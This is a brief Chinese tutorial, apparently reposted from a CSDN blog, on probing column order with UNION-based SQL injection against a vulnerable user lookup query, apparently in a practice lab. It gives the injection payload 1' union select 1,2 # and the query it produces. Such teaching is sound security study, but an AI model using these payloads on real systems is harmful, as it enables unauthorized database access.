1.猜解字段顺序方法: ①构造union select 联合查询语句 2.构造过程: ①源码语句: select first_name,last_name from users where user_id='$id' ②构造语句:1' union select 1,2 # ③提交构造的语句是: select first_name,last_name from users where user_id=’ 1 union select 1,2# ’
注意:union select 1,2 就是在主结果集的后面追加1和2example1: 
example2: 
本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/qq_45555226/article/details/102882264